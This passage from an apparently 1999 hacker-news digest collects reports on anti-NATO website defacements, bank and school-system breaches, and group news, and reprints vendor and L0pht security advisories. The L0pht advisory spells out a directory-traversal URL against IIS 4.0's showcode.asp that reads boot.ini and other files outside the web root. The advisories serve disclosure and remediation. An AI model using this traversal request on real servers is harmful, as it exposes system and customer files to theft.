attacking web sites. The US Embassy in China, The DOE, and the Department of Interior are a few of
the web sites that have had their web pages changed as a direct result of the bombings. Most of
the slogans posted on the pages are extremely anti USA and NATO and and evoke Chinese nationalism
and patriotism.

ABC News
http://www.abcnews.go.com/go/sections/world/DailyNews/kosovo_chinacyber_990509.html

Protests Reach Cyberspace
By Stacy Lu -- ABCNEWS.com

May 9, 7:51am PT — Protests over NATO’s bombing of the Chinese embassy in Belgrade have spilled into
cyberspace.
Enraged hackers apparently attacked the official Web site of the U.S. embassy in China yesterday, took
over the Web sites of the Departments of Energy and the Interior today, and established their own online
convention center at a site called “killusa.”
As a result, the Department of Interior Web site on Sunday displayed pictures of the Chinese journalists
killed on Saturday after NATO accidentally bombed the Chinese embassy in Belgrade. The Department of
Energy site read “Protest USA’s Nazi action.”
It was unclear whether the hacking was done by Chinese or not, though several messages on Chinese
Web sites and message boards based in China claimed that it was.
According to Chinese news reports, hackers also launched attacks on the official White House site,
which features an automated restoration function set to operate within five seconds of an attack.
The messages posted on attacked sites were vitriolic, patriotic and, in some cases, poetic.
One read “Down with the Yanks. The fate of the Chinese people has reached the most critical point” — a
play upon the lyrics of the Chinese national anthem, reflecting a similar patriotic call after the Japanese
invaded China in 1937.
A poem was posted that has appeared before other civilian unrests in China such, particularly in 1976
after the death of Premier Zhou Enlai. A rough translation: “I grieve while the wolves howl/I cry while the
beasts cheer/I shower the martyrs with my tears while unsheathing the sword.”
Communist slogans also appeared, a rarity in today’s China. One of the hacked sites declared “This hill
has been taken over by the commies.”

Message Boards Overflowing
Bulletin boards based in China were full of messages condemning the U.S. and NATO’s mistaken bombing
of the Chinese embassy.
“You think you have a strong army without human nature and a great number of brazen politicians just
like you ... pose as the world cop and think the world must run under your rules, your human rights, your
democracy," one message read.
The Department of Energy’s home page also had a message that read, “We are Chinese hackers that
takes no cares about politics, but we can not stand by seeing our Chinese reporters been killed.”
The hackers’ own site at killusa.abc.yesite.com, a repository of hacking strategies, had nearly 1,000
messages Sunday, either reporting sites being hacked or expressing anti-American sentiments.
Rumors flew thick and fast, among them that NATO had again bombed the Chinese embassy in
Belgrade and that Chinese President Jiang Zemin had said that China must be prepared to go to war.
Another stated that the intelligence reports provided to NATO prior to the embassy bombing were supplied
by a NATO officer angry with China over its treatment of Tibet.
A contributor to the page also suggests manning a full-scale attack on American Web sites,
disseminating computer viruses, and attacking the sites continuously in a method the hackers term
“machine-gunning.” Another suggests targeting financial sites.



Copyright 1999 ABC News Internet Ventures

-=-

Washington Post;


[Moderator: Mirrors of these hacks can all be found at
http://www.attrition.org/mirror/attrition]


http://www.washingtonpost.com/wp-srv/inatl/longterm/balkans/stories/hackers051299.htm


Anti-NATO Hackers Sabotage 3 Web Sites
By Stephen Barr
Washington Post Staff Writer
Wednesday, May 12, 1999; Page A25


Computer hackers protesting NATO's bombing of the Chinese Embassy in
Belgrade sabotaged three U.S. government Web sites, Clinton administration
officials said yesterday.


The hackers placed anti-NATO messages on Web pages operated by the Energy
Department, the Interior Department and one Interior bureau, the National
Park Service. The cyber-attacks late Sunday forced the Energy Department
and the Park Service to shut down their home pages for much of Monday.


The Interior Department hacker "
was traced back to China by DOI computer
experts," said Interior spokesman Tim Ahearn. "The FBI is looking into it
now."


Energy spokeswoman Michelle Del Valle said, "
We don't know who did it,"
but she noted that "
the hackers claimed in a message that they were
Chinese." She said the DOE has started an investigation.


The officials said the Web pages were pulled off line quickly after the
sabotage was discovered. Electronic firewalls protected other parts of the
departmental computer systems from attack, they said.


Del Valle said hackers placed the following message, with parts in
imperfect English, on the DOE's site:


"
Protest U.S.A.'s Nazi action! Protest NATO's brutal action! We are
Chinese hackers who take no cares about politics. But we can not stand by
seeing our Chinese reporters been killed which you might have know.
Whatever the purpose is, NATO led by U.S.A. must take abosolute
responsibility. You have owed Chinese people a bloody debt which you must
pay for. We won't stop attacking until the war stops!"


NATO bombed the Chinese Embassy in Belgrade on Saturday, killing three
people, including at least one journalist. U.S. and NATO officials said
the bombing was an accident caused by reliance on an outdated map.


At Interior, Ahearn said hackers sabotaged the home page about 10 p.m.
Sunday, replacing photographs and information with "
pictures of Asian
people and Chinese writing." It took about five hours to take the page off
the Web, restore data and bring it back on line.


Another federal Web site ­ Recreation.gov ­ was hit April 30 and was down
until May 3, Ahearn said.


The White House Web site was shut down Monday night after attempts were
made Monday morning to hack into the system. White House spokesman Barry
Toiv said it was shut down through last night to try to determine whether
hackers tampered with the White House computer system. Toiv said he did
not know who was responsible.


-o-
Subscribe: mail majordomo@repsec.com with "
subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]


@HWA

05.0 "
The Egg" `Cracked'.
~~~~~~~~~~~~~~~~~~~~

The Egg, Cracked

From HNN http://www.hackernews.com/


contributed by Code Kid
A UK internet savings bank known as the Egg, owned by Prudential, was the victim of a security flaw that
allowed some users to see other users confidential financial information. The article goes on to explain a
classic example of poor implementation. Just because they use encryption does not mean that they are
secure. The bank claims that they have solved the problem.

BBC

http://news.bbc.co.uk/hi/english/business/the_company_file/newsid_337000/337975.stm

Business: The Company File

Crack in Egg's security

It's security, but not as you'd want it

UK Internet savings bank Egg, owned by Prudential, has rushed to close a security flaw that allowed some users
to see other potential savers' confidential financial information.

Egg did not make the security flaw public, but BBC News Online was alerted to the problem by two of its
readers.

One of them called the lack of security "
very worrying".

New site with flaws

The fault developed 10 days ago when Egg moved its operations fully to the Internet and relaunched its
Website with new technology.

Several people who tried to apply online for an Egg account, suddenly saw somebody else's application
flash up on the screen - including confidential information like home address, phone numbers, e-mail address,
the amount of money to be invested and other details.

Two shocked customers alerted Egg to the problem, whose IT team then desperately tried to track down the
fault.

Peter Marsden, IT director at Egg, told BBC News Online that the flaw was corrected during the afternoon of
the same day.

Encryption breaches security


Ironically, the problem was triggered by Egg's own security measures. People who try to apply for
an Egg account are asked to log on to the system by identifying themselves with their e-mail address and a
password.

This information is then encrypted and used to 'log the session', i.e. make sure that the computer makes the
right connection between the Internet user and its own electronic records.

However, the new system was not configured to cope with long e-mail addresses. Every e-mail address longer
than about 30 letters was automatically truncated.

Because of the encryption process, people with long, albeit very different e-mail addresses, could end up with
identical IDs.

The flaw became apparent when, for example, mandatory sections in the application form were not filled
in correctly and Egg's web server sent back the page demanding additional information.

At this point, a page containing confidential information could be sent to somebody else with the identical ID.

If hackers had been aware of the security flaw, they could have deliberately flooded Egg's servers, identifying
themselves with long, but false e-mail addresses, hoping to glean personal information of Egg customers.

Egg has now ironed out the problem and changed the system so it can cope with e-mail addresses of any
length.

Online, and growing

The Egg savings account has been a phenomenal success, exceeding the wildest expectations of parent
company Prudential.

Within six months the company managed to reach its five-year target, with 500,000 customers who have put
£5bn in its accounts.

To help its customers to get online, the Egg has launched a free Internet access service, similar to
Dixon's succesful Freeserve.

However, the success has come at a price. The Egg venture is losing millions, and Prudential does not
expect it to make money for some years.

@HWA

06.0 Student changes grades
~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Student Changes Grades


contributed by Weld Pond
An unidentified student of Douglas County High School has admitted to breaking into the schools
computer system and changing the grades of four students. Sgt. Attila Denes, spokesman for the
Douglas County sheriff called their technique "
ingenious". Of course the article does not give
any technical details. The student has been suspended for 10 days, may face expulsion and criminal
charges including forgery, use of forged academic records and criminal tampering.

Inside Denver
http://insidedenver.com/news/0507hack1.shtml

Boy admits altering Douglas High grades

By Tillie Fong
Denver Rocky Mountain News Staff Writer


CASTLE ROCK -- Four Douglas County High School students decided
last month they could hack their way into better grades, authorities said
Thursday.

One 16-year-old boy broke into the school's record system and raised
some low marks.

"
The technique they used was ingenious," said Sgt. Attila Denes,
spokesman for the Douglas County sheriff.

The hacker figured out a way to get access to records via the school's
library computer and fax machine. He also used commercially available
software to obtain the password.

The boy apparently got into the system at least 30 times starting in
mid-April.

"
He changed an average of two to three grades for each student and
changed the failing or near failing grades to A's and B's," Denes said.

On April 30, school employee Joan Elderton noticed that several changes
were made to four students' grades without authorization, and notified
assistant principal Ron England.

Bruce Caughey, spokesman for Douglas County schools, said one of the
things that gave the hacker away was the time and date log the computer
system keeps.

"
School officials were able to determine when the changes were made," he
said.

That same day, administrators called in the hacker and his father.

"
The student initially denied everything," Denes said.

But the following Monday, he submitted a letter to school officials in which
he admitted making the changes and described how he did it.

At that time, he also said he had altered the grades for three other
students.

"
The school administrator subsequently talked to the other three boys, and
they each said that they had asked this other boy to change the grades on
their behalf," Denes said.

Since then, the hacker has been suspended for 10 days, and the other
three students for five days.

They also face criminal charges, and possible expulsion.

Possible charges against the hacker include forgery, use of forged
academic records and criminal tampering.

The other three boys are looking at criminal solicitation and use of forged
academic records charges. None of the boys was named because of their
age.

"
The students showed quite a bit of resourcefulness," said Denes. "It's too
bad it couldn't have been channeled more positively."


May 7, 1999

@HWA


07.0 IBM's Gift To Australia's Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

IBMs Gift to Australias Security


contributed by photon
It is hard to tell if it is the person being written about or the reporter doing the writing but
this "
news article" makes it seem that Guy Denton was sent from IBM to save all of Australia from
cyber attacks. A prime example of sensationalistic advertising hiding as "
news".

The Sydney Morning Herald
http://www.smh.com.au/news/9905/08/text/national4.html

Hacker tracker plays a risky game

Date: 08/05/99

By JAMES WOODFORD, Science Writer

Guy Denton is the hackers' policeman, the keeper of knowledge so central to our society that should he
change sides he would be one of the most dangerous men on Earth.

His job is to enter other people's computer systems, detect the presence of illegal hackers, prevent
systems from being attacked and to slowly - when students have proven they can be trusted - teach a new
generation of "
ethical" hackers how to hunt down bad guys in cyberspace.

An ethical hacker is a computer expert who legally enters clients' computer systems searching for chinks
in security.

Mr Denton said hacking is the "
getting of any information that you do not have the right to see".

It is also the wreaking of havoc within computer systems by entering and changing codes so that a company
or bureaucracy's business is disrupted.

Mr Denton, 40, an American, is in Australia to take a new crop of IBM recruits to higher levels of
anti-hacking skills.

The company searches for talented university graduates with the right skills to become professional
ethical hackers with the right psychological makeup to ensure that the skills they are taught are not
misused. Mr Peter Watson, an ethical hacker also with IBM, said: "
We tend to stay away from people who
hold themselves out as hackers.

"But we look for certain personality traits - puzzle-solving ability, inquisitiveness - people who are
not comfortable until they have been all the way through something.

"
They are people who have got to have the full picture."

They are also young - most, said Mr Watson, were in their mid-20s.

"
If you look back through history we have always had things like the Silk Road," Mr Watson said. "They were
always exposed to bandits and pirates and you are really just seeing our trade routes moved to an electronic
basis.

"We are the security guards of the Internet."

The Australian team of ethical hackers - their numbers are a closely guarded secret - work out of a darkened
room on Sydney's Lower North Shore with a bank of computers from where just about any computer system in the
world can be accessed.

Companies concerned about the security of their systems pay a fee of between $15,000 and $40,000 plus costs

  
to allow the ethical hackers to break into their network.

"In some circumstances they don't tell their computer system administrators that there is a hack going on,"
Mr Denton said.

Once the ethical hackers have entered the system they then wait to see how long it takes for their presence
to be detected or whether once it is detected proper
procedures are followed.

If the "attack" is not detected at all, then advice is given to the client on the installation of a "warning
intrusion alarm system"
or an upgrading of security.

"The level of activity is occurring a lot more," Mr Watson said. "We are starting to see a lot of activity."

Until recently most hacking activity in Australia tended to take place after hours, when people had left work
or university students had finished their day's study.

However, as more people from overseas are realising that Australia is a promising hacking target, the
intrusions are occurring more on a 24-hour basis as people dial
in from places like the United States.

Hackers are able to access a company's computer system by calling in externally and then using programs to
actually enter the systems.

Advice on how to enter computer systems is readily available on the Internet and magazines give tips on how
to enter various systems. Computer hacking programs are also now being sold illegally.

However, in spite of the increasing sophistication being employed by hackers, by far the biggest volume of
intrusions are what are described as "script kiddies".

The greatest fear for the ethical hacker is the anonymous computer whiz or somebody hell bent on mischief
working from within.

"A rogue employee typically does not make themselves known," said Mr Denton.

The ethical hackers acknowledge that their work gives them the power to cause huge problems for society and
have to work ensuring that the staff they train do not cross the line to illegality.

"I could cause a huge amount of chaos," Mr Denton said. "But I am not going to do that.

"
We have to be sure that our guys are not going to get bored and do things they are not supposed to do."



@HWA



08.0 SCREAM busted
~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by scream

SCREAM Busted
Last Friday HNN reported that S C R E A M a member of H.A.R.P (Hackers Against Racist
Parties) and well known for his fight against racism and fascism had been apprehended by
law enforcement. HNN has received confirmation of this earlier report. The FBI questioned
SCREAM for 27 hours about 26 different security breaches and his ethics on hate-groups. It
is unknown if he has been charged with a crime.

@HWA


09.0 Corel Hacked
~~~~~~~~~~~~

From http://www.net-security.org/

COREL HACKED
by BHZ, Tuesday 11th May 1999 on 5:10 pm CET
Several of Corel domains have been compromised by Team Sploit. Hackers convict
NATO attack on Chinese embassy in Belgrade. "
whew. when i heard the news about
NATO bombing the Chinese embassy in Serbia, i thought heaven was falling down...
^Oh, sorry, it was a mistake", was the explanation we heard from NATO
spokesmen^"
. See archive of www.corel.com below

http://www.net-security.org/spec/hack/corel.com.htm

@HWA

10.0 G0at Security calls it quits
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

G0AT QUITS
by BHZ, Tuesday 11th May 1999 on 2:58 pm CET
G0at security is officially finished. They had some problems (including wiping of their
server, fights between members, taking of their EffNet channel #feed-the-goats...).
Their earlier hacks are stored on Attrition mirror. Read finishing statement by Debris
below

///////////////////////////////////////////
GGGGGG OOOOOOO AAAAAAAA TTTTTTTTTT
G O O A A TT
G GGG O O AAAAAAAA TT
G G O O A A TT
GGGGGG OOOOOOO A A TT
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Due to recent events, the downfall of g0at security has become imminent.

These incidents include:

- Legal problems of some of our members.
- Recent hacking crack downs launched by many governments.
- The recent takeover of our channel, #feed-the-goats (Efnet).
- Losing our server due to a sloppy hack by one of our members (/me looks away).
- Losing our text files due to our domain being wiped off the server.
- Fights and dissapearances of some of our members.
- The maturing of our members.

g0at security hereby announces it's closure. By this we do not mean we are going legit,
we are finished. Unlike other groups we most likely will not spawn back.

[Brief history of g0at security]

One day in Feb. I believe, ech0 and myself (Debris), decided to irc. ech0 informed me that
occasionally hung out in a channel he, himself created called #feed-the-goats. From there,
members of a popular group, HcV along with members of Global Hell, began coming. ech0 and
myself decided that we wanted to be as elite as our peers in #rootworm, so we made a webpage.
The purpose of the page was to mock and satirize hacker culture in general. Our first document
entitled "g0at declares war on LoU" mocked the Legion of the Underground's new attempt at
becoming legit among a handful of other aspects of their organization.

Our original url (goat.sphix.com) quickly grew in size and popularity, and our channel became
more populated. The hacks began soon after, some by members and a lot by non-members. g0at's
highpoint came soon after the controversial yahoo hack. Our popularity skyrocketted and the
name g0at became known to all (unfortunatly we got all the l33t0s in our channel and wouldn't
go away). The fun and games continued up until April, when all the 'incidents' began. Then
May was the last straw.

[Where do we go from here]

Most members will most likely go their own ways. Many still hang in #feed-the-goatz (our new
channel). No more text releases will come from g0at, our webpage will remain down, our archive
on attrition.org will stay the same and nothing will be heard of us as a group.

[Thanks and greets]

Thanks to all that supported our group and enjoyed the text we wrote to amuse the unintelligent.
Greets to all our 12 members, HNN, attrition, net-security, HWA.hax0r.news. JP, for entertaining
us for hours with your hacker journalism. And thanks to all the rest.


Finally.... it's been fun. It's been awesome being associated with g0at.

You can still reach us at g0at@attrition.org for further questions or comments or whatever (I just want email)


g0at---------------------------------------------------------------------------------------------

[]=Debris=[]
debris@attrition.org

@HWA

11.0 Guninski uncovers yet another browser bug
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

ANOTHER BROWSER VULNERABILITY
by BHZ, Tuesday 11th May 1999 on 2:52 pm CET
Georgi Guninski reports another browser bug to BugTraq: "There is a design flaw in
both Internet Explorer 5.0 and Netscape Communicator 4.51 Win95 (guess all 4.x
versions of both browsers are vulnerable too) in the way they handle bookmarks. The
problem arises if the user bookmarks (adds to favorites) and later chooses a specially
designed javascript: URL. When the bookmark is chosen later, the JavaScript code in
it is executed in the context (the same domain and protocol) of the document opened
prior to choosing the bookmark. So, the JavaScript code has access to documents in
the same domain. An interesting case is choosing the bookmark when the active
document is a local file (the protocol is "
file:") - then the JavaScript code has access
to local files and directories"
.

@HWA

12.0 Freaky to do a Macintosh related speech at Defcon7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

FREAKY'S DEFCON7 SPEACH
by LucasAr, Tuesday 11th May 1999 on 2:30 pm CET
As you probably know Freaky will be giving a first time ever Macintosh security
related speech on DEFCON7. You can read his announcement and the topics he
plans to address below, and I urge you to visit Freaks Macintosh Archives.
http://freaky.staticusers.net/

Freaks Macintosh Archives Author Freaky will be speaking at this years Hacker Convention
located in Las Vegas, NV called DefCon 7 <www.defcon.org>

This is the first speach of its kind dealing with the MacOS and its security. We plan on
covering the following topics:
Macintosh Security Products:
OnGuard, FileGuard, Screen 2 Screen, FoolProof, AtEase

Macintosh Underground Products:
Such as programs to destruct a security product or cause another computer to crash (Denial of
Service Attack)

We will also cover how macs are vulnerable to DoS attacks.
And release new programs for the Mac Platforms.

Freaks Macintosh Archives
http://freaky.staticusers.net/

@HWA

13.0 IIS 2.0 "Security" by p0lix
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Originally posted on http://www.403-security.org/

IIS 2.0 "Security"



Microsoft is wrestling with security holes in its Site Server and Internet Information Server (IIS)
products that expose system files -- including potentially sensitive Internet-commerce customer
files or databases -- through any remote web browser.

The flaws, discovered by members of l0pht are caused from default configurations that install three
active server pages without proper access control list settings.

LOpht has warned that E-commerce server information -- including transaction logs, credit card
numbers, and other customer information -- are potentially at risk.

"There is even E-commerce shopping cart software that stores administrative passwords in simple
text files,"
LOpht warned.

Using these active server pages -- viewcode.asp, codebrws.asp, and showcode.asp -- someone could
view sensitive or compromising information from that system. The problem affects Versions 3.x of
Site Server and 4.x of IIS; both are used in E-commerce infrastructures.

It's bad if you've got an e-commerce database installed on that system, because almost anyone can
use Active Server Pages to locate databases and get into database information, and you can also
view the source code of HTML pages.

A WebTrends engineer found that the holes were so wide he could use them on an Internet search
engine and determine what servers were similarly configured.

He was able to view the parameters of any file and you can get information that will lead you
through all the systems throughout the network.

Microsoft officials were working on new versions of the tools to correct the vulnerability, which
security product manager Scott Culp said should be complete by early next week, and planned to
issue a security bulletin on the issues Friday afternoon.

In the meantime, potential workarounds include checking the Active Server Pages settings, or
deleting the tools altogether.

As a Web site operator, you want to give customers the opportunity to look at the code on their
page, however, this vulnerability allows somebody to misuse these tools to possibly look at other
files on the server.

For more information visit the l0pht web site at http://www.l0pht.com


-p0liX (p0lix@403-security.org)

@HWA

14.0 l0pht Security Advisory on MS IIS 4.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

L0pht Security Advisory


-------------
URL Origin: http://www.l0pht.com/advisories.html
Release Date: May 7th, 1999
Application: Microsoft IIS 4.0 Web Server
Severity: Web users can view ASP source code and other sensitive
files on the web server
Author: weld@l0pht.com
Operating Sys: Microsoft NT Server 4.0
--------------


I. Description


Internet Information Server (IIS) 4.0 ships with a set of sample files
to help web developers learn about Active Server Pages (ASP). One of
these sample files, showcode.asp, is designed to view the source
code of the sample applications via a web browser. The showcode.asp
file does inadequate security checking and allows anyone with a web
browser to view the contents of any text file on the web server. This
includes files that are outside of the document root of the web
server.


Many ecommerce web servers store transaction logs and other customer
information such as credit card numbers, shipping addresses, and
purchase information in text files on the web server. This is the
type of data that could be accessed with this vulnerability.


The L0pht would like to thank Parcens for doing the initial research on
this problem.


II. Details


The showcode.asp file is installed by default at the URL:


http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp


It takes 1 argument in the URL, which is the file to view. The format of
this argument is:


source=/path/filename


So to view the contents of the showcode.asp file itself the URL would be:


http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/SELECTOR/showcode.asp


This looks like a fairly dangerous sample file. It can view the contents
of files on the system. The author of the ASP file added a security check
to only allow the viewing of the sample files which were in the '/msadc'
directory on the system. The problem is the security check does not test
for the '..' characters within the URL. The only checking done is if the
URL contains the string '/msadc/'. This allows URLs to be created that
view, not only files outside of the samples directory, but files anywhere
on the entire file system that the web server's document root is on.


For example, a URL that will view the contents of the boot.ini file, which
is in the root directory of an NT system is:


http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../../boot.ini


This URL requires that IIS 4.0 was installed in its default location.



III. Solution


For production servers, sample files should never be installed so delete
the entire /msadc/samples directory. If you must have the showcode.asp
capability on development servers the showcode.asp file should be modified
to test for URLs with '..' in them and deny those requests.



For specific questions about this advisory, please contact
weld@l0pht.com


---------------
For more L0pht (that's L - zero - P - H - T) advisories check out:
http://www.l0pht.com/advisories.html
---------------

@HWA

15.0 X-Force Security advisory on Oracle 8: Multiple file system vulnerabilties
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ISS Security Advisory
May 6, 1999


Multiple File System Vulnerabilities in Oracle 8


Synopsis:


Internet Security Systems (ISS) X-Force has discovered that multiple
vulnerabilities exist in Oracle 8 that may allow local attackers to exploit
weaknesses in Oracle administrative tools. Oracle is the market leader in
enterprise database solutions. Attackers may use these vulnerabilities to
amplify their privilege to that of the 'oracle' user. By default, the
oracle user controls the entire Oracle database system. Attackers may
launch local denial of service attacks against the database as well as alter
or manipulate data.



Affected Versions:


ISS X-Force has determined that most current versions of Oracle 8 for Unix
are vulnerable. These versions include 8.03, 8.04, 8.05, and 8.15. Oracle
8 for Windows NT is not affected by these vulnerabilities.


Description:


The Oracle 8 distribution is shipped with many administrative utilities that
are owned by the oracle user with the setuid bit enabled. Several of these
utilities implement insecure file creation and manipulation. These
utilities also trust Oracle-related environment variables. The combined
effect of these vulnerabilities may allow local attackers to create, append
to, or overwrite privileged oracle files. Certain vulnerabilities exist
that may allow local attackers to execute arbitrary commands as the oracle
user. Attackers may also be able to permanently elevate their privilege to
that of the oracle user.


Temporary files that follow symbolic links are a common source of
vulnerabilities in setuid executables. Administrators should remove or
restrict access to setuid executables if possible.


Developers of setuid programs need to take special precautions to prevent
the introduction of vulnerabilities of this nature. ISS X-Force recommends
that all Unix developers become familiar with Matt Bishop's secure
programming guide, available at
http://olympus.cs.ucdavis.edu/~bishop/secprog.html


Fix Information:


ISS X-Force has worked with Oracle to provide a patch for the
vulnerabilities described in this advisory. Oracle has provided the
following FAQ to answer any questions concerning these vulnerabilities.


Q: I've heard about a setuid security issue with the Oracle database? What
is this all about?
A: On Unix platforms, some executable files have the setuid bit on. It may
be possible for a very knowledgeable user to use these executables to bypass
your system security by elevating their operating system privileges to that
of the Oracle user.


Q: Which releases are affected by this problem?
A: This problem affects Oracle data server releases 8.03, 8.0.4, 8.0.5, and
8.1.5 on Unix platforms only.


Q: Can I correct this problem or do I need a patch?
A: This problem can easily be corrected. The customer can download the patch
from the Oracle MetaLink webpages at http://www.oracle.com/support/elec_sup.
The patch is a Unix shell script. This shell script should be run
immediately, and also run after each relink of Oracle.


Q: What is Oracle doing to fix this problem?
A: Effective immediately, Oracle will provide the patch on Oracle's
Worldwide Support Web pages. Oracle will ensure the patches are incorporated
into future releases of Oracle8i (8.1.6) and Oracle8.0 (8.0.6)


Q: What is Oracle doing to notify users about this problem now?
A: Oracle is notifying all supported customers, via the Oracle Worldwide
Support Web pages, of this issue so they can address it as required.


ISS X-Force also recommends that all administrators complete a proactive
survey on the use or potential misuse of setuid bits on privileged
executables on their systems.


Credits:


These vulnerabilities were primarily researched by Dan Ingevaldson of the
ISS X-Force.


________


Copyright (c) 1999 by Internet Security Systems, Inc. Permission is
hereby granted for the electronic redistribution of this Security Alert.
It is not to be edited in any way without express consent of the X-Force.
If you wish to reprint the whole or any part of this Alert Summary in any
other medium excluding electronic medium, please e-mail xforce@iss.net for
permission.


About ISS
ISS is the pioneer and leading provider of adaptive network security
software delivering enterprise-wide information protection solutions. ISS'
award-winning SAFEsuite family of products enables information risk
management within intranet, extranet and electronic commerce environments.
By combining proactive vulnerability detection with real-time intrusion
detection and response, ISS' adaptive security approach creates a flexible
cycle of continuous security improvement, including security policy
implementation and enforcement. ISS SAFEsuite solutions strengthen the
security of existing systems and have dramatically improved the security
posture for organizations worldwide, making ISS a trusted security advisor
for firms in the Global 2000, 21 of the 25 largest U.S. commercial banks
and over 35 governmental agencies. For more information, call ISS at
678-443-6000 or 800-776-2362 or visit the ISS Web site at www.iss.net.


Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties with regard to this information. In no event shall the
author be liable for any damages whatsoever arising out of or in
connection with the use or spread of this information. Any use of this
information is at the user's own risk.


X-Force PGP Key available at: http://www.iss.net/xforce/sensitive.html
as well as on MIT's PGP key server and PGP.com's key server.


Please send suggestions, updates, and comments to:
X-Force <xforce@iss.net> of Internet Security Systems, Inc.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: noconv


iQCVAwUBNzLwJzRfJiV99eG9AQFDHwP/U4iParVoaPwPea8i+mXciMELGUDga2UM
Iyk6T6poQ9G3ASefs+v6Lm509xDeGCcPTi1MB7SvzUBb1vx95yOhu4M9CJHWOTCJ
3/ZlpV1Zdc7s/+N0ACxFNPozOmQvpT3OhbJKOakNQxDg3q/VbVXcJOxJ0DBKy7Xe
d0ehW7p2OqQ=
=6FXz
-----END PGP SIGNATURE-----

@HWA

16.0 Microsoft Security Bulletin: File viewers vulnerability (MS99-13)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following is a Security Bulletin from the Microsoft Product Security
Notification Service.


Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************


Microsoft Security Bulletin (MS99-013)
--------------------------------------


Solution Available for File Viewers Vulnerability


Originally Posted: May 7, 1999


Summary
=======
Microsoft has identified a vulnerability that occurs in some file viewers
that ship as part of Microsoft (r) Internet Information Server and Site
Server. The vulnerability could allow a web site visitor to view, but not to
change, files on the server, provided that they knew or guessed the name of
each file and had access rights to it based on Windows NT ACLs.


Microsoft is releasing this security bulletin to inform customers of the
vulnerability and enable them to eliminate it immediately. Patches are being
developed for the affected file viewers, and will be available shortly. When
they are available, an update to this security bulletin will be released.


Issue
=====
Microsoft Site Server and Internet Information Server include tools that
allow web site visitors to view selected files on the server. These are
installed by default under Site Server, but must be explicitly installed
under IIS. These tools are provided to allow users to view the source code
of sample files as a learning exercise, and are not intended to be deployed
on production web servers. The underlying problem in this vulnerability is
that the tools do not restrict which files a web site visitor can view.


It is important to note several important points:
- These file viewers are not installed by default under IIS.
They are only installed under IIS if the user chooses to install
the sample web files.
- This vulnerability only allows a web site visitor to view files.
There is no capability through this vulnerability to change files
or add files to the server.
- This vulnerability does not in any way bypass the Windows NT file
permission ACLs. A web site visitor could only use these tools to
view files whose ACLs allows them read access. The administrator of
the web server determines the specific permissions for all files on
the server.
- The viewers can only be used to view files on the same disk partition
as the currently-displayed web page. Databases such as those used by
e-commerce servers are typically stored on a different physical drive,
and these would not be at risk
- The web site visitor would need to know or guess the name of each file
they wished to view.


Specific steps that customers can take to immediately eliminate the
vulnerability are discussed below in What Customers Should Do. In addition,
Microsoft is developing updated versions of the file viewers and will
release them shortly.


While there are no reports of customers being adversely affected by this
vulnerability, Microsoft is proactively releasing this bulletin to allow
customers to take appropriate action to protect themselves against it.


Affected Software Versions
==========================
- Microsoft Site Server 3.0, which is included with Microsoft Site
Server 3.0 Commerce Edition, Microsoft Commercial Internet
System 2.0, and Microsoft BackOffice Server 4.0 and 4.5
- Microsoft Internet Information Server 4.0


What Microsoft is Doing
=======================
Microsoft has provided this bulletin to inform customers of specific steps
that they can take to immediately eliminate this vulnerability on their
servers. Microsoft is developing updated file viewers that fix the problem
identified, and will release an updated version of this bulletin when they
are available.


Microsoft also has sent this security bulletin to customers subscribing
to the Microsoft Product Security Notification Service. See
http://www.microsoft.com/security/services/bulletin.asp for more
information about this free customer service.


Microsoft has published the following Knowledge Base (KB) article on this
issue:
- Microsoft Knowledge Base (KB) article Q231368,
Solution Available for File Viewers Vulnerability,
http://support.microsoft.com/support/kb/articles/q231/3/68.asp.
(Note: It might take 24 hours from the original posting of this
bulletin for the KB article to be visible in the Web-based
Knowledge Base.)


What Customers Should Do
========================
Customers should take the following steps to eliminate the vulnerability on
their web servers:
- Unless the affected file viewers are specifically required on the
web site, they should be removed. The following file viewers are
affected: ViewCode.asp, ShowCode.asp, CodeBrws.asp and Winmsdp.exe.
Depending on the specific installation, not all of these files may
be present on a server. Likewise, there may be multiple copies of
some files, so customers should do a full search of their servers
to locate all copies.
- In accordance with standard security guidelines, file permissions
should always be set to enable web visitors to access only the files
they need, and no others. Moreover, files that are needed by web
visitors should provide the least privilege needed; for example,
files that web visitors need to be able to read but not write should
be set to read-only.
- As a general rule, sample files and vroots should always be deleted
from a web server prior to putting it into production. If they are
needed, file access permissions should be used to regulate access to
them as appropriate


More Information
================
Please see the following references for more information related to this
issue.
- Microsoft Security Bulletin MS99-013,
Solution Available for File Viewers Vulnerability
(The Web-posted version of this bulletin),
http://www.microsoft.com/security/bulletins/ms99-013.asp.
- Microsoft Knowledge Base (KB) article Q231368,
Solution Available for File Viewers Vulnerability,
http://support.microsoft.com/support/kb/articles/q231/3/68.asp.


Obtaining Support on this Issue
===============================
If you require technical assistance with this issue, please contact
Microsoft Technical Support. For information on contacting Microsoft
Technical Support, please see
http://support.microsoft.com/support/contact/default.asp.


Acknowledgments
===============
Microsoft acknowledges WebTrends (www.webtrends.com) for discovering this
vulnerability and reporting it to us.


Revisions
=========
- May 07, 1999: Bulletin Created.


For additional security-related information about Microsoft products, please
visit http://www.microsoft.com/security



